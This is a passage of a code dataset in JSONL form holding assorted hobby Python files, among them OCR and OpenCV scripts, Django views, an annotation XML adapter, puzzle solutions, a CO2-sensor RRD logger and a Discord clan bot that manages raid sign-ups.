ExtractIDDataHamming(ExtractIDDate):\n\n def _extract_data(frame):\n img_arr = Image.fromarray(frame) # convert from array to image\n img_arr_grey = img_arr.convert('L') # use grey converter (greyscale)\n img_arr_thresh = img_arr_grey.point(lambda x: 0 if 0<=x<=150 else -256) # set threshold for black and white\n frame_txt = image_to_string(img_arr_thresh) # get text from black and white image\n return frame_txt\n\ndef main():\n Extract_ID = ExtractIDDataQR()\n my_dir = os.getcwd()\n file_name = sys.argv[1]\n file_dir = os.path.join(my_dir,file_name)\n image = cv2.imread(file_dir, cv2.IMREAD_GRAYSCALE)\n print(Extract_ID.get_data(image))\n\n\nif __name__==\"__main__\":\n main()\n","sub_path":"TestingEnvironment/TestScripts/QR_testing/basic_examples/ExtractIDData.py","file_name":"ExtractIDData.py","file_ext":"py","file_size_in_byte":2388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"555587161","text":"from django.shortcuts import render\n\n# List of Dictionaries below\nposts = [\n {\n 'author': 'CoreyMS',\n 'title': 'Blog Post 1',\n 'content': 'First post content',\n 'date_posted': 'August 27, 2019'\n },\n {\n 'author': 'Jane Doe',\n 'title': 'Blog Post 2',\n 'content': 'Second post content',\n 'date_posted': 'August 28, 2019'\n }\n]\n\n\ndef 
home(request):\n    # Here we set a dictionary called context\n    # the 'posts' key variable is accessible within our \n    # home.html template\n    # the corresponding value for the dict is the posts list of dicts\n    # which we defined above\n    context = {\n        'posts': posts\n    }\n    return render(request, 'Blog/home.html', context)\n    \n\ndef about(request):\n    return render(request, 'Blog/about.html')\n    \n\n\n\n\n","sub_path":"DjangoBlogProject/Django_Blog_Project/Blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"8314536","text":"'''\nCheck SubTree:\n    Determine if t2 is a subtree of t1\n'''\n\n\nclass Node:\n    def __init__(self, data=None):\n        self.data = data\n        self.left = None\n        self.right = None\n\ndef preOrder(node, s): # Builds and returns the preorder traversal string, adding an X for None\n\tif node == None:\n\t\treturn s + 'X'\n\ts = s + str(node.data) # Add root\n\ts = preOrder(node.left, s) # Add left subtree\n\ts = preOrder(node.right, s) # Add right subtree\n\treturn s\n\ndef containsTree(t1, t2):\n\ts1 = preOrder(t1, '') # strings are immutable, so the traversal must return its result\n\ts2 = preOrder(t2, '')\n\n\treturn s2 in s1 # Check if s2 is a substring of s1","sub_path":"Cracking the Coding Interview/Trees and Graphs/CheckSubtree.py","file_name":"CheckSubtree.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"48127148","text":"import math\nimport xml.etree.ElementTree as et\nfrom datasetTools.AnnotationAdapter import XMLAdapter\n\n\nclass ASAPAdapter(XMLAdapter):\n    \"\"\"\n    Exports predictions to ASAP annotation format\n    \"\"\"\n    '''\n    Layout produced by this adapter:\n    <ASAP_Annotations>\n        <Annotations>\n            <Annotation Name=\"...\" Type=\"Polygon\" PartOfGroup=\"...\" Color=\"...\">\n                <Coordinates>\n                    <Coordinate Order=\"0\" X=\"...\" Y=\"...\" />\n                </Coordinates>\n            </Annotation>\n        </Annotations>\n        <AnnotationGroups>\n            <Group Name=\"...\" PartOfGroup=\"None\" Color=\"...\">\n                <Attributes />\n            </Group>\n        </AnnotationGroups>\n    </ASAP_Annotations>\n    '''\n\n    def __init__(self, imageInfo: dict, verbose=0):\n        super().__init__(imageInfo, \"ASAP_Annotations\", verbose=verbose)\n        self.annotations = et.Element('Annotations')\n        self.annotations.text = \"\\n\\t\\t\"\n        self.annotations.tail = \"\\n\\t\"\n        self.addToRoot(self.annotations)\n        self.groups = et.Element('AnnotationGroups')\n        self.groups.text = \"\\n\\t\\t\"\n        self.groups.tail = \"\\n\"\n        self.addToRoot(self.groups)\n        self.nbAnnotation = 0\n        self.nbGroup = 0\n        self.classCount = {}\n\n    def addAnnotation(self, classInfo: {}, points):\n        if classInfo[\"name\"] not in self.classCount:\n            self.classCount[classInfo[\"name\"]] = 0\n\n        mask = et.Element('Annotation')\n        mask.set('Name', \"{} {} ({})\".format(classInfo[\"name\"], self.classCount[classInfo[\"name\"]], self.nbAnnotation))\n        mask.set(\"Type\", \"Polygon\")\n        mask.set(\"PartOfGroup\", classInfo[\"name\"])\n        mask.set(\"Color\", \"#F4FA58\")\n        mask.text = \"\\n\\t\\t\\t\"\n        mask.tail = \"\\n\\t\\t\"\n        self.annotations.append(mask)\n\n        coordinates = et.Element('Coordinates')\n        coordinates.text = \"\\n\\t\\t\\t\\t\"\n        coordinates.tail = \"\\n\\t\\t\"\n        mask.append(coordinates)\n\n        for i, pt in enumerate(points):\n            coordinate = et.Element('Coordinate')\n            coordinate.set(\"Order\", str(i))\n            coordinate.set(\"X\", str(pt[0]))\n            coordinate.set(\"Y\", str(pt[1]))\n            coordinate.tail = \"\\n\\t\\t\\t\" + (\"\\t\" if i != len(points) - 1 else \"\")\n            coordinates.append(coordinate)\n\n        self.classCount[classInfo[\"name\"]] += 1\n        self.nbAnnotation += 1\n\n    def addAnnotationClass(self, classInfo: {}):\n        group = et.Element('Group')\n        group.set('Name', classInfo[\"name\"])\n        group.set('PartOfGroup', \"None\")\n        group.set(\"Color\", classInfo[\"color\"])\n        group.text = \"\\n\\t\\t\\t\"\n        group.tail = \"\\n\\t\\t\"\n\n        attribute = 
et.Element('Attributes')\n attribute.tail = \"\\n\\t\\t\"\n group.append(attribute)\n\n self.nbGroup += 1\n self.groups.append(group)\n\n def __str__(self):\n # Fix indentation of Annotations and AnnotationGroups closing tags\n if self.nbAnnotation == 0:\n self.annotations.text = \"\"\n else:\n self.annotations[-1].tail = \"\\n\\t\"\n if self.nbGroup == 0:\n self.groups.text = \"\"\n else:\n self.groups[-1].tail = \"\\n\\t\"\n return super().__str__()\n\n @staticmethod\n def getPriorityLevel():\n return 10\n\n @staticmethod\n def canRead(filePath):\n canRead = XMLAdapter.canRead(filePath)\n if canRead:\n tree = et.parse(filePath)\n root = tree.getroot()\n canRead = root.tag == \"ASAP_Annotations\"\n return canRead\n\n @staticmethod\n def readFile(filePath):\n canRead = ASAPAdapter.canRead(filePath)\n assert canRead\n tree = et.parse(filePath)\n root = tree.getroot()\n masks = []\n # Going through the XML tree and getting all Annotation nodes\n for annotation in root.findall('./Annotations/Annotation'):\n maskClass = annotation.attrib.get('PartOfGroup')\n ptsMask = []\n # Going through the Annotation node and getting all Coordinate nodes\n for points in annotation.find('Coordinates'):\n xCoordinate = points.attrib.get('X')\n yCoordinate = points.attrib.get('Y')\n ptsMask.append([xCoordinate, yCoordinate])\n masks.append((maskClass, ptsMask))\n return masks\n","sub_path":"datasetTools/ASAPAdapter.py","file_name":"ASAPAdapter.py","file_ext":"py","file_size_in_byte":4508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"421243259","text":"from PIL import Image\nimport numpy as np\nimport cv2\n\n## Read image and change the color space\nimgname = \"test_4.jpg\"\nimg = cv2.imread(imgname)\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n## Get mser, and set parameters\nmser = cv2.MSER_create()\nmser.setMinArea(0)\nmser.setMaxArea(10000)\n\n## Do mser detection, get the coodinates and bboxes\ncoordinates, bboxes = mser.detectRegions(gray)\n\n## Filter the coordinates\nvis = img.copy()\nboxs = []\ncoords = []\n\n\ndef resize(num):\n a = 1\n while len(boxs)-num > a:\n x1 = boxs[num][0] + boxs[num][2]\n x2 = boxs[num + 1][0]\n x3 = x2 + boxs[num + 1][2]\n y1 = boxs[num][1] + boxs[num][3]\n y2 = boxs[num + 1][1]\n y3 = y2 + boxs[num + 1][3]\n if x1 >= x2 >= boxs[num][0] or y1 >= y2 >= boxs[num][1]:\n if x1 >= x2:\n if x1 < x3:\n boxs[num][2] += x3 - x1\n print('ok1')\n if y1 >= y2:\n if y1 < y3:\n boxs[num][3] += y3 - y1\n print('ok2')\n del boxs[num + 1]\n else:\n break\n print(\"a\", a)\n a += 1\n\n\nfor coord in coordinates:\n bbox = cv2.boundingRect(coord)\n x, y, w, h = bbox\n # cv2.rectangle(gray, (x-2, y-2), (x+w+2, y+h+2),(3, 255, 4), 1)\n coords.append(coord)\n boxs.append([x, y, w, h])\n\n\nfor i in range(len(boxs)):\n if i == len(boxs)-2:\n break\n else:\n print(i)\n resize(i)\n continue\n\nfor i in range(len(boxs)):\n print(boxs[i])\n x = boxs[i][0]\n y = boxs[i][1]\n w = boxs[i][2]\n h = boxs[i][3]\n cv2.rectangle(gray, (x , y), (x + w, y + h), (3, 255, 4), 1)\ncv2.imshow(\"hi\", gray)\ncv2.waitKey(0)\n\n## colors\n# colors = [[255,255,255]]\ncolors = [[43, 43, 200], [43, 75, 200], [43, 106, 200], [43, 137, 200], [43, 169, 200], [43, 200, 195], [43, 200, 163],\n [43, 200, 132], [43, 200, 101], [43, 200, 69], [54, 200, 43], [85, 200, 43], [116, 200, 43], [148, 200, 43],\n [179, 200, 43], [200, 184, 43], [200, 153, 43], [200, 122, 43], [200, 90, 43], [200, 59, 43], [200, 43, 64],\n [200, 43, 95], [200, 43, 127], [200, 43, 158], [200, 
43, 190], [174, 43, 200], [142, 43, 200], [111, 43, 200],\n [80, 43, 200], [43, 43, 200]]\n\n## Fill with random colors\nnp.random.seed(0)\ncanvas1 = img.copy()\ncanvas2 = cv2.cvtColor(gray, cv2.COLOR_GRAY2BGR)\ncanvas3 = np.zeros_like(img)\n\nfor cnt in coords:\n xx = cnt[:, 0]\n yy = cnt[:, 1]\n color = colors[np.random.choice(len(colors))]\n canvas1[yy, xx] = color\n canvas2[yy, xx] = color\n canvas3[yy, xx] = color\n\n## Save\ncv2.imwrite(\"result1.png\", canvas1)\ncv2.imwrite(\"result2.png\", canvas2)\ncv2.imwrite(\"result3.png\", canvas3)\n\n# cv2.imshow(\"imgae_1\", canvas3)\n# cv2.waitKey(0)\n\n# for coord in coordinates:\n# bbox = cv2.boundingRect(coord)\n# x, y, w, h = bbox\n# cv2.rectangle(canvas1, (x - 2, y - 2), (x + w + 2, y + h + 2), (3, 255, 4), 1)\n\n# cv2.imshow(\"canvas3\", canvas1)\n# cv2.waitKey(0)\n\n\n","sub_path":"ocr_2.py","file_name":"ocr_2.py","file_ext":"py","file_size_in_byte":3003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"508757192","text":"class Solution(object):\n def gameOfLife(self, board):\n \"\"\"\n :type board: List[List[int]]\n :rtype: void Do not return anything, modify board in-place instead.\n \"\"\"\n if not board:\n return\n \n if board and not board[0]:\n return\n \n for i in range(len(board)):\n for j in range(len(board[0])):\n alive = board[i][j]\n live_c, dead_c = self.checkNeighbours(i,j,board)\n board[i][j] = self.determineState(live_c,dead_c,alive)\n \n for i in range(len(board)):\n for j in range(len(board[0])):\n board[i][j] = board[i][j] >> 1\n \n \n def checkNeighbours(self,i,j,board):\n live_c = 0\n dead_c = 0\n for a in range(i-1,i+2,1):\n for b in range(j-1,j+2,1):\n if a>=0 and b>=0 and acolumn data and provide header->choices if choices is less than total\n \"\"\"\n # get one column to get total\n first_key = data.keys()[0]\n total = len(data[first_key])\n\n attributes = {}\n\n # any column that has less than total, get distincts\n for key,column in data.iteritems():\n uniques = set(column)\n if len(uniques) < total:\n attributes[key] = uniques\n\n return attributes ","sub_path":"DataTransform/DataTransform/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"44915244","text":"input = open('13.in').readlines()\n\nscanners = {}\nsum = 0\n\ndef pos_scan(t, l):\n\tf_len = 2 * l - 2\n\tp_t = t % f_len\n\tif p_t > f_len / 2:\n\t\tp_t = f_len - p_t\n\treturn p_t\n\nfor l in input:\n\tvals = l.strip().split(': ')\n\tlayer = int(vals[0])\n\tl_range = int(vals[1])\n\tprint(\"layer \" + str(layer) + \" has a range of \" + str(l_range))\n\tscanners[layer] = l_range\n\t\n\tif pos_scan(layer, l_range) == 0:\n\t\tprint(\"caught!!!\")\n\t\tsum += layer*l_range\n\nprint(\"sum severity is \" + str(sum))\n\nt_offset = 0\nfor i in range(10000000):\n\tcaught = False\n\tfor layer in scanners.keys():\n\t\trange = scanners[layer]\n\t\tif pos_scan(layer+i, range) == 0:\n\t\t\t# print(\"caught!!!\")\n\t\t\tcaught = True\n\t\t\tbreak\n\tif not caught:\n\t\tt_offset = i\n\t\tbreak\n\nprint(\"found viable route at delay \" + str(t_offset))\t\t\n","sub_path":"13.py","file_name":"13.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"650795574","text":"breite = int(input(\"Breite = \"))\r\nhoehe = int(input(\"Höhe = \"))\r\n\r\nzeile = \"\"\r\nhilf = 1\r\nfor i in 
range(breite):\r\n if hilf == 4:\r\n zeile = zeile + \"+\"\r\n hilf = 1\r\n else:\r\n zeile = zeile + \"*\"\r\n hilf = hilf + 1\r\n\r\nfor i in range(hoehe):\r\n print(zeile)\r\n","sub_path":"01 Python/20171110/rechteck.py","file_name":"rechteck.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"559722057","text":"from mrjob.job import MRJob\n\nclass PartB(MRJob):\n\n def mapper(self,_,line):\n try:\n fields = line.split('\\t')\n if len(fields) == 2:\n add = fields[0]\n agg = float(fields[1])\n yield (None,(add, agg))\n except:\n pass\n\n\n def combiner(self,key,val):\n sorted_values = sorted(val,reverse=True, key=lambda tup:tup[1])\n\n i=0\n for v in sorted_values:\n yield (\"Top\",v)\n i += 1\n if i >= 10:\n break\n\n def reducer(self,key,val):\n sorted_values = sorted(val, reverse=True, key=lambda tup: tup[1])\n\n i = 0\n for v in sorted_values:\n yield ((v[0], v[1]))\n i+=1\n if i>=10:\n break\n\n\nif __name__=='__main__':\n PartB.run()","sub_path":"Part B/PartBTop10.py","file_name":"PartBTop10.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"275664125","text":"#!/bin/python\n\nimport sys, fcntl, time, rrdtool, os, argparse, socket\nfrom rrdtool import update as rrd_update\nfrom CO2Meter import *\n\n# System settings\nRRDDB_LOC = \"/var/local/monitor/co2-temp.rrd\"\nGRAPHOUT_DIR = \"/usr/share/nginx/html/images\"\n\ndef now():\n \"\"\"Get the current time.\"\"\"\n return int(time.time())\n\ndef graphout(period):\n \"\"\"Create a graph with rrdtool.\"\"\"\n\n # CO2 graph\n filename = GRAPHOUT_DIR + \"/co2-\" + period + \"-graph.png\" \n rrdtool.graph(filename,\n \"--start\", \"now-\"+period, \"--end\", \"now\",\n \"--title\", \"CO2\",\n \"--vertical-label\", \"CO2 PPM\",\n \"--width\", \"600\",\n \"-h 200\",\n \"-l 0\",\n \"DEF:co2_num=\"+RRDDB_LOC+\":CO2:AVERAGE\",\n \"LINE1:co2_num#0000FF:CO2\",\n \"GPRINT:co2_num:LAST: Last\\\\:%8.2lf %s \",\n \"GPRINT:co2_num:MIN: Min\\\\:%8.2lf %s \",\n \"GPRINT:co2_num:AVERAGE: Avg\\\\:%8.2lf %s \",\n \"GPRINT:co2_num:MAX: Max\\\\:%8.2lf %s\\\\n\",\n \"HRULE:500#16F50F:OK\",\n \"COMMENT: \\\\n\",\n \"HRULE:800#FF952B:DEV-WARN\",\n \"COMMENT: \\\\n\",\n \"HRULE:1000#3FC0EB:OFF-WARN\",\n \"COMMENT: \\\\n\",\n \"HRULE:1200#DE2C2F:CRIT\"\n )\n\n # Temperature graph\n filename = GRAPHOUT_DIR + \"/temp-\" + period + \"-graph.png\" \n rrdtool.graph(filename,\n \"--start\", \"now-\"+period, \"--end\", \"now\",\n \"--title\", \"TEMP\",\n \"--vertical-label\", \"TEMP C\",\n \"--width\", \"600\",\n \"-h 200\",\n \"DEF:temp_num=\"+RRDDB_LOC+\":TEMP:AVERAGE\",\n \"LINE1:temp_num#00FF00:TEMP\",\n \"GPRINT:temp_num:LAST: Last\\\\:%8.2lf %s \",\n \"GPRINT:temp_num:MIN: Min\\\\:%8.2lf %s \",\n \"GPRINT:temp_num:AVERAGE: Avg\\\\:%8.2lf %s \",\n \"GPRINT:temp_num:MAX: Max\\\\:%8.2lf %s \\\\n\"\n )\n\n return 0\n\ndef create_database(location):\n \"\"\"Create RRD database at given location.\n\n Updated every 5 minutes (--step 300)\n Two datasources which can hold unlimit values min and max\n Saves 1 day in 5-minute resolution (288 * (300*1/60) / 60/24)\n Saves 1 week in in 15-minute resolution (672 * (300*3/60) / 60/24)\n Saves 1 month in 1-hour resolution (744 * (300*12/60) / 60/24)\n Saves 7 years in 1-hour resolution\n\t\"\"\"\n\n rddbh = rrdtool.create(location,\n \"--step\", \"300\", \"--start\", '0',\n \"DS:CO2:GAUGE:600:U:U\",\n \"DS:TEMP:GAUGE:600:U:U\",\n 
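# DS spec format is DS:name:GAUGE:heartbeat:min:max, so 600:U:U means a 600 s heartbeat with unbounded (U) min and max\n                           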
\"RRA:AVERAGE:0.5:1:288\",\n \"RRA:AVERAGE:0.5:3:672\",\n \"RRA:AVERAGE:0.5:12:744\",\n \"RRA:AVERAGE:0.5:12:61320\",\n \"RRA:MIN:0.5:1:288\",\n \"RRA:MIN:0.5:3:672\",\n \"RRA:MIN:0.5:12:744\",\n \"RRA:MIN:0.5:12:61320\",\n \"RRA:MAX:0.5:1:288\",\n \"RRA:MAX:0.5:3:672\",\n \"RRA:MAX:0.5:12:744\",\n \"RRA:MAX:0.5:12:61320\"\n )\n return rddbh\n\n\nif __name__ == \"__main__\":\n\n # Set a lock on the socket to indicate that the script is already running\n try:\n s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\n ## Create an abstract socket, by prefixing it with null.\n s.bind('\\0postconnect_gateway_notify_lock')\n except socket.error as e:\n # if script is already running just exit silently\n sys.exit(0)\n\n if len(sys.argv) < 2:\n dev = \"/dev/hidraw0\"\n else:\n dev = sys.argv[1]\n\n values = {}\n stamp = now()\n\n # Create RRD database if needed\n if not os.path.isfile(RRDDB_LOC):\n print(\"RRD database not found, generating it ..\")\n rddbh = create_database(RRDDB_LOC)\n\n # Open the sensor\n sensor = CO2Meter(\"/dev/hidraw0\")\n\n # Primary program loop\n while True:\n # Poll every 0.25s, a reasonable load\n time.sleep(0.25)\n # Grab the data\n try:\n data = sensor.get_data()\n except IOError as e:\n # USB device disconnected or unavailable\n sys.stderr.write(\"ERROR: CO2 monitor no longer available!\")\n sys.exit(1)\n\n # Check if all data is available\n if (\"co2\" in data) and (\"temperature\" in data):\n co2 = data[\"co2\"]\n temp = data[\"temperature\"]\n\n # Write output in standard output\n sys.stdout.write(\"CO2: {:4d} TMP: {:3.1f} \\r\".format(co2, temp))\n sys.stdout.flush()\n\n # Store data in database\n if (now() - stamp) > 60:\n print(\">>> sending dataset CO2: {:4d} TMP: {:3.1f} ..\".format(co2, temp))\n # Update database\n rrd_update(RRDDB_LOC, \"N:{:s}:{:s}\".format(str(co2), str(temp)))\n # Create graphs\n graphout(\"8h\")\n graphout(\"24h\")\n graphout(\"7d\")\n graphout(\"1m\")\n graphout(\"1y\")\n # Replace the 'now' time stamp\n stamp = now()\n","sub_path":"monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":4731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"277527611","text":"import os\nimport sys\nimport random\nfrom torch.utils.data import Dataset\nfrom utils import tokens_to_seq, contains_digit, shuffle_correlated_lists\nfrom operator import itemgetter\n\nclass Language(object):\n def __init__(self, vocab_limit, data):\n self.data = data\n\n self.vocab = self.create_vocab()\n\n truncated_vocab = sorted(self.vocab.items(), key=itemgetter(1), reverse=True)[:vocab_limit]\n\n self.tok_to_idx = dict()\n self.tok_to_idx[''] = 0\n self.tok_to_idx[''] = 1\n self.tok_to_idx[''] = 2\n self.tok_to_idx[''] = 3\n for idx, (tok, _) in enumerate(truncated_vocab):\n self.tok_to_idx[tok] = idx + 4\n self.idx_to_tok = {idx: tok for tok, idx in self.tok_to_idx.items()}\n\n def create_vocab(self):\n # Note that this vocab is case sensitive\n vocab = dict()\n for data_pair in self.data:\n tokens = data_pair[0] + data_pair[1]\n for token in tokens:\n # Track frequency of each word in the vocab\n vocab[token] = vocab.get(token, 0) + 1\n return vocab\n","sub_path":"language.py","file_name":"language.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"628476339","text":"#!/usr/bin/env python3\n\n# Standard lib imports\nimport asyncio\nimport logging\nimport datetime\nimport re\nimport sys\nfrom pathlib 
import Path\n\n# Non-Standard lib imports\nimport discord\nfrom discord.ext import commands\n\n# Local imports\nimport definesettings as setting\nfrom cogs.utils import separator\n\n\nasync def run():\n bot = Bot(description=setting.DESCRIPTION)\n try:\n bot.start(setting.BOT_TOKEN)\n except KeyboardInterrupt:\n await bot.logout()\n\n\ndef raids_embed():\n embed_title = \"**Raids**\"\n\n clan_banner_url = f\"http://services.runescape.com/m=avatar-rs/l=3/a=869/{setting.CLAN_NAME}/clanmotif.png\"\n raids_notif_embed = discord.Embed(title=embed_title,\n description=\"\",\n color=discord.Colour.dark_blue())\n raids_notif_embed.set_thumbnail(url=clan_banner_url)\n\n raids_notif_embed.add_field(\n name=\"Marque presença para os Raids de 21:00\",\n value=f\"{setting.RAIDS_CHAT_ID}\\n\"\n f\"\\n\"\n f\"É obrigatório ter a tag <@&376410304277512192>\\n - Leia os tópicos fixos para saber como obter\\n\"\n f\"\\n\"\n f\"Não mande mensagens desnecessárias no {setting.RAIDS_CHAT_ID}\\n\"\n f\"\\n\"\n f\"Não marque presença mais de uma vez\\n\"\n f\"\\n\"\n f\"Esteja online no jogo no mundo 75 até 20:50 em ponto.\\n\"\n f\"- Risco de remoção do time caso contrário. Não cause atrasos\",\n inline=False)\n return raids_notif_embed\n\n\nasync def raids_notification(user, channel, start_day, channel_public=None, time_to_send=\"23:00:00\"):\n while True:\n today = datetime.datetime.utcnow().date()\n if (today - start_day).days % 2 == 0 or \"testraid\" in sys.argv:\n date = str(datetime.datetime.utcnow().time())\n time = date[0:7]\n time_to_send = time_to_send[0:7]\n if time == time_to_send or \"testraid\" in sys.argv:\n team_list = []\n embed = raids_embed()\n print(f\"$ Sent Raids notification, time: {time}\")\n await channel.send(content=\"<@&376410304277512192>\", embed=embed)\n raids_notif_msg = await channel.history().get(author=user)\n team_embed = discord.Embed(\n title=f\"__Time Raids__ - {len(team_list)}/10\",\n description=\"\"\n )\n await channel.send(embed=team_embed)\n raids_team_message = await channel.history().get(author=user)\n invite_embed = discord.Embed(\n title=f\"Marque presença para 'Raids' (10 pessoas)\",\n description=f\"{separator}\\nTime: {channel.mention}\\nRequisito: <@&376410304277512192>\\n\\n\"\n f\"Marque presença apenas se for estar **online** no jogo até 20:50 em ponto **no Mundo 75.**\\n\\n\"\n f\"`in`: Marcar presença\\n\"\n f\"`out`: Retirar presença\"\n )\n await channel_public.send(embed=invite_embed)\n last_message = await channel_public.history().get(author=user)\n sent_time = datetime.datetime.now()\n while True:\n async for message in channel_public.history(after=last_message):\n if message.content.lower() == 'in':\n await message.delete()\n if len(team_list) >= 10:\n await channel_public.send(f\"{message.author.mention}, o time de Raids já está cheio! ({len(team_list)}/10)\")\n else:\n if 'Raids' in str(message.author.roles):\n if message.author.mention in team_list:\n await channel_public.send(f\"Ei {message.author.mention}, você já está no time! Não tente me enganar.\")\n else:\n await channel_public.send(f\"{message.author.mention} foi adicionado ao time de Raids. ({len(team_list)}/10)\")\n team_list.append(message.author.mention)\n else:\n await channel_public.send(f\"{message.author.mention}, você não tem permissão para ir Raids ainda. 
Aplique agora usando o comando `{setting.PREFIX}raids`!\")\n if message.content.lower() == 'out':\n await message.delete()\n if message.author.mention in team_list:\n team_list.remove(message.author.mention)\n await channel_public.send(f\"{message.author.mention} foi removido do time de Raids. ({len(team_list)}/10)\")\n else:\n await channel_public.send(f\"Ei {message.author.mention}, você já não estava no time! Não tente me enganar.\")\n last_message = message\n team_embed = discord.Embed(\n title=f\"__Time Raids__ - {len(team_list)}/10\",\n description=\"\"\n )\n for index, person in enumerate(team_list):\n team_embed.add_field(\n name=separator,\n value=f\"{index + 1}- {person}\",\n inline=False\n )\n try:\n await raids_team_message.edit(embed=team_embed)\n except discord.errors.NotFound:\n print(f'$ Raids team message deleted manually at {datetime.datetime.now()} - no longer accepting Raids Team entries')\n break\n diff = datetime.datetime.now() - sent_time\n if diff.total_seconds() > (60 * 60):\n print('$ No longer accepting Raids Team entries')\n break\n print('$ Deleting Raids notification messages in 30 Minutes')\n await asyncio.sleep(60 * 30)\n print('$ Deleting Raids notification messages')\n await raids_notif_msg.delete()\n await raids_team_message.delete()\n await asyncio.sleep(5)\n\n\nclass Bot(commands.Bot):\n\n def __init__(self, **kwargs):\n super().__init__(\n command_prefix=setting.PREFIX,\n description=kwargs.pop('description'),\n case_insensitive=True,\n )\n self.remove_command('help')\n self.start_time = None\n self.app_info = None\n self.raids_channel = None\n self.raids_channel_public = None\n self.loop.create_task(self.track_start())\n self.loop.create_task(self.load_all_extensions())\n\n async def track_start(self):\n \"\"\"\n Waits for the bot to connect to discord and then records the time.\n Can be used to work out up-time.\n \"\"\"\n await self.wait_until_ready()\n await asyncio.sleep(1)\n if 'raids_notif' not in setting.DISABLED_COGS:\n if setting.ATLBOT_ENV == 'prod':\n self.raids_channel = self.get_channel(393104367471034369)\n self.raids_channel_public = self.get_channel(393696030505435136)\n elif setting.ATLBOT_ENV == 'dev':\n self.raids_channel = self.get_channel(505240114662998027)\n self.raids_channel_public = self.get_channel(505240135390986262)\n raids_start_day = datetime.date(2018, 10, 25)\n raids_time = \"23:00:00\"\n print(f\"-- Channel set to send raids notification: #{self.raids_channel} at {raids_time}\")\n print(f\"-- Channel set to send raids presence notifications: #{self.raids_channel_public}\")\n self.loop.create_task(raids_notification(\n user=self.user,\n channel=self.raids_channel,\n start_day=raids_start_day,\n channel_public=self.raids_channel_public,\n time_to_send=raids_time))\n self.start_time = datetime.datetime.utcnow()\n\n async def load_all_extensions(self):\n \"\"\"\n Attempts to load all .py files in /cogs/ as cog extensions\n \"\"\"\n await self.wait_until_ready()\n await asyncio.sleep(1) # ensure that on_ready has completed and finished printing\n\n if setting.ATLBOT_ENV == 'prod':\n cogs = ['chat', 'clan', 'competitions', 'error_handler', 'rsatlantis', 'welcome_message', 'teams']\n else:\n cogs = [x.stem for x in Path('cogs').glob('*.py')]\n for extension in cogs:\n if extension not in setting.DISABLED_COGS:\n try:\n self.load_extension(f'cogs.{extension}')\n print(f'- loaded Extension: {extension}')\n except discord.ClientException:\n pass\n except Exception as e:\n error = f'{extension}\\n {type(e).__name__} : {e}'\n 
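# note: the loop continues past a failed cog, so one bad extension does not abort the remaining loads\n                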
print(f'failed to load extension {error}')\n print('-' * 10)\n\n async def on_ready(self):\n \"\"\"\n This event is called every time the bot connects or resumes connection.\n \"\"\"\n print('-' * 10)\n self.app_info = await self.application_info()\n await self.change_presence(game=discord.Game(name=setting.PLAYING_NOW))\n print(f\"Bot logged on as '{self.user.name}'\\n\"\n f\"Mode: {setting.ATLBOT_ENV}\\n\"\n f\"Argvs: {sys.argv}\\n\"\n f\"Owner: '{self.app_info.owner}'\\n\"\n f\"ID: '{self.user.id}'\\n\"\n f\"Oauth URL: '{setting.OAUTH_URL}'\\n\\n\"\n f\"[ Bot Settings ]\\n\"\n f\"- Clan Name: '{setting.CLAN_NAME}'\\n\"\n f\"- Playing Message: '{setting.PLAYING_NOW}'\\n\"\n f\"- Commands prefix: '{setting.PREFIX}'\\n\"\n f\"- Language: '{setting.LANGUAGE}'\\n\"\n f\"- Show titles on claninfo: '{setting.SHOW_TITLES}'\")\n\n async def on_message(self, message):\n \"\"\"\n This event triggers on every message received by the bot. Including one's that it sent itself.\n If you wish to have multiple event listeners they can be added in other cogs. All on_message listeners should\n always ignore bots.\n \"\"\"\n if message.author.bot:\n return\n membro = '<@&321015529059909674>'\n convidado = '<@&321015669883797506>'\n if membro in message.author.roles or convidado in message.author.roles or True:\n if membro in message.content or convidado in message.content or '@everyone' in message.content or '@here' in message.content:\n embed = discord.Embed(\n title=\"__Quebra de Conduta__\",\n description=separator,\n color=discord.Color.dark_red(),\n )\n embed.add_field(\n name=f\"Por favor não utilize as seguintes menções sem permissão para tal:\",\n value=f\"{membro} - {convidado} - @everyone - @here\",\n inline=False\n )\n embed.set_author(\n name=\"Administração\",\n icon_url=\"http://www.runeclan.com/images/ranks/1.png\"\n )\n embed.set_thumbnail(\n url=f\"http://services.runescape.com/m=avatar-rs/{setting.CLAN_NAME}/clanmotif.png?cachebust=1541099511258\"\n )\n embed.set_footer(\n text=\"Nosso servidor abriga uma quantidade muito grande de pessoas, tenha bom senso ao utilizar uma menção que irá notificar centenas de pessoas.\"\n )\n\n print(f'> {message.author} used a not allowed mention in channel #{message.channel} at {datetime.datetime.now()}')\n print(f\"Content:\\n<\\n{message.content}\\n>\")\n await message.delete()\n return await message.channel.send(content=message.author.mention, embed=embed)\n\n # Replace old Rs Wikia links to the new Rs Wiki links\n if 'http' in message.content and 'runescape.wikia.com/wiki/' in message.content:\n urls = re.findall(r\"http\\S+\", message.content)\n formatted_urls = []\n for url in urls:\n if 'runescape.wikia.com/wiki/' in url:\n url = 